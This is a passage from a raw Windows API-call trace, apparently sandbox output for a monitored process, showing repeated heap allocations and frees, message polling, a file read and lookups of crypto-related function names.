hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0193.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0193.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0193.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0193.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0193.665] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0193.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0193.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0193.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0193.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0193.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0193.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0193.665] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0193.665] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0193.665] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0193.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0193.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0193.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0193.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0193.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0193.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0193.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0193.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0193.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0193.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0193.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0193.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0193.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0193.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0193.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0193.666] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0193.666] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xb330, lpOverlapped=0x0) returned 1 [0193.686] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0193.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0193.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0193.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0193.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0193.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb330) returned 0xbea018 [0193.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0193.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0193.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0193.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0193.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0193.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0193.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb330) returned 0xbf5350 [0193.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0193.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0193.688] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0193.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0193.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0193.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0193.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0193.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb330) returned 0xbea018 [0193.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0193.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0193.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0193.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0193.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0193.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0193.688] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0193.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0193.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0193.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0193.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0193.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0193.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0193.689] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0193.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0193.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0193.689] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0193.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0193.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0193.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0193.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0193.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0193.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0193.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0193.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb330) returned 0xbea018 [0193.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0193.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2758 [0193.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0193.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0193.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0193.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0193.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0193.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0193.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0193.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0193.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0193.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0193.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0193.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fe8 [0193.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0193.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0193.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0193.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0193.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0193.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb330) returned 0xc00688 [0193.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0193.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0193.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0193.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0193.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0193.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0193.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0193.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0193.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0193.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0193.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0193.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0193.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0193.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0193.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0193.693] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0193.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0193.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0193.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0193.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0193.693] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0193.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0193.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0193.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0193.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0193.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0193.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0193.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0193.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0193.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0193.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0193.694] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0193.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0193.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0193.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0193.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27c8 [0193.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0193.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0193.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0193.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0193.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7f8 [0193.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0193.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0193.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0193.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0193.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0193.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0193.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0193.694] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0193.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0193.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0193.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0193.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0193.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0193.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0193.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0193.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0193.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0193.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0193.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0193.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0193.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0193.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0193.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0193.695] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0193.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0193.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0193.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0193.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0193.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0193.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0193.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0193.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0193.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0193.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0193.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0193.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0193.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0193.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0193.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0193.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0193.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0193.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0193.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0193.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0193.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0193.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0193.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0193.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0193.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0193.696] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0193.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0193.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0193.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0193.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0193.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0193.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0193.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0193.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0193.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0193.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0193.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0193.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0193.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0193.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0193.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0193.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0193.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0193.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0193.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0193.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0193.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0193.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0193.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0193.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0193.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0193.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0193.697] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0193.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0193.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0193.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0193.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0193.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0193.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0193.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0193.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0193.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0193.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0193.698] RtlAllocateHeap 